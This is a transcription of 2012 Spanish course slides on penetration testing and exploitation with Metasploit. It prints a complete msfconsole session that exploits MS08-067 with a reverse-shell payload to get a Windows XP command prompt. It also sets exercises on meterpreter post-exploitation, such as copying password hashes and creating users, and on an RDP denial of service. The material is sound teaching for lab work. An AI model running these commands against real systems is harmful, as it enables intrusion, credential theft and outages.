Test de intrusión III: explotación de

Transcripción

Test de intrusión III: explotación de
Seguridad y Alta Disponibilidad:
Test de intrusión (III): explotación de vulnerabilidades
Jesús Moreno León
jesus.moreno.edu@
juntadeandalucía.es
Septiembre 2012
© Jesús Moreno León, Septiembre de 2012
Algunos derechos reservados.
Este artículo se distribuye bajo la licencia
“Reconocimiento-CompartirIgual 3.0 España" de Creative
Commons, disponible en
http://creativecommons.org/licenses/by-sa/3.0/es/deed.es
Este documento (o uno muy similar)
está disponible en (o enlazado desde)
http://informatica.gonzalonazareno.org
Exploits
Cuando se han encontrado los bugs, el objetivo es crear una
herramienta que saque partido de ellos, es decir, que sea capaz
de hacer uso de esa “funcionalidad no definida del programa”.
Para ello, se analizan las posibilidades y alcance de ese bug y se
opta por un determinado exploit, que es, precisamente, un
código escrito con el fin de aprovechar un bug para obtener
diversos privilegios.
Todos los exploits tienen dos partes diferenciadas:
●
●
La cabecera, que es lo que se denomina exploit puramente y
que depende de cada bug
El cuerpo, denominado payload que son acciones ya
programadas que se reutilizan entre los diferentes exploits
Búsqueda de exploits
El número de vulnerabilidades que se publican diariamente es
altísimo. Sin embargo, el número de exploits que se ponen
disponibles no iguala ni por asomo al de vulnerabilidades
Frameworks como Metasploit son una herramienta básica para
todo pentester, pero no contiene todos los exploits disponibles,
ya que, por ejemplo, muchos exploits sólo se incluyen en
frameworks comerciales, como Canvas de Immunity, ya que son
desarrollados con sus equipos de exploiters y no son públicos
Una buena base de datos es la de http://www.cvedetails.com
Fuente: Seguridad Apple
http://www.seguridadapple.com/2012/10/cvedetails-buscar-exploits-para.html
CVEDetails
CVEDetails
Explotando los bugs
Metasploit es una herramienta
que aúna una base de datos de
cabeceras de exploits y de
payloads.
Se usa por profesionales de la
seguridad informática para
realizar Pentests, administradores
de sistemas para verificar la
instalación de parches e
investigadores de todo el mundo
para realizar pruebas.
http://www.metasploit.com/
Metasploit Express
La versión Express es de pago y no es más que un front-end
para el framework Metasploit que incorpora funcionalidades que
automatizan el proceso de un test de intrusión y permite generar
informes con los resultados. Pasos a seguir:
1. Crear un proyecto
2. Descubrir dispositivos
3, Conseguir acceso a los equipos
4. Tomar el control de una sesión
5. Recoger datos de las máquinas atacadas
6. Limpiar la sesión
7. Generar un informe
Metasploit Express
Veamos los pasos a seguir para conseguir una sesión en este
equipo, que es un Windows XP en el que un usuario está
navegando por Internet
Metasploit Express
Metasploit Express
Metasploit Express
Metasploit Express
Metasploit Express
Metasploit Express
Metasploit Express
Metasploit Express
Metasploit Express
Metasploit Framework
Este framework incluye
herramientas, bibliotecas, módulos
y una interfaz de usuario. La
funcionalidad básica es un lanzador
de módulos que permite al usuario
configurar un exploit y lanzarlo
contra un equipo objetivo. Si el
exploit tiene éxito, se ejecuta el
payload en el objetivo y se le facilita
al usuario una shell para interactuar
con el payload.
http://www.elladodelmal.com/2010/07/metasploit-con-adobe-flash-player-un.html
Metasploit Framework
¿Cómo se configuran y se lanzan los exploits con el framework?
msf> use exploit/windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi)> set RHOST X.X.X.X
RHOST => 192.168.56.101
msf exploit(ms08_067_netapi)> set PAYLOAD windows/shell_reverse_tcp
PAYLOAD => windows/shell_reverse_tcp
msf exploit(ms08_067_netapi) > set LHOST Y.Y.Y.Y
LHOST => 192.168.56.1
msf
exploit(ms08_067_netapi) > exploit
[*] Started reverse handler on 192.168.56.1:4444
[*] Automatically detecting the target...
[*] Fingerprint: Windows XP - Service Pack 3 – lang:Spanish
[*] Selected Target: Windows XP SP3 Spanish (NX)
[*] Attempting to trigger the vulnerability...
Microsoft Windows XP [Versi?n 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\WINDOWS\system32>
Metasploit Framework
●
Práctica 1: aprovechando la misma vulnerabilidad y usando
el mismo exploit, utiliza el payload meterpreter e investiga
todas las posibilidades que te ofrece una vez conseguida una
sesión en la máquina objetivo:
●
Subir ficheros
●
Ejecutar programas
●
Descargar ficheros
●
Activar el acceso remoto
●
Crear usuarios
●
Copiar las hashes de las passwords
●
...
Metasploit Framework
●
Práctica 2: DOS a Windows 7, a través de una versión no
actualizada del escritorio remoto
CVE-2012-0002
1. Localizar exploit
2. Configurar exploit
3. Lanzar exploit
4. Pantallazo azul
Más información
●
Estas diapositivas están basadas en el curso
Pentesting con Metasploit Framework, impartido por Pablo
González de Informática 64.
●
http://www.flu-project.com
●
http://www.seguridadapple.com
●
www.elladodelmal.com/

Documentos relacionados

Test de intrusión - IES Gonzalo Nazareno

Test de intrusión - IES Gonzalo Nazareno Una vez que se tienen los objetivos iniciales marcados con direcciones IPs lo siguiente es situarlos en la red y geográficamente, para averiguar cuál es la ubicación física y quiénes son sus provee...

Más detalles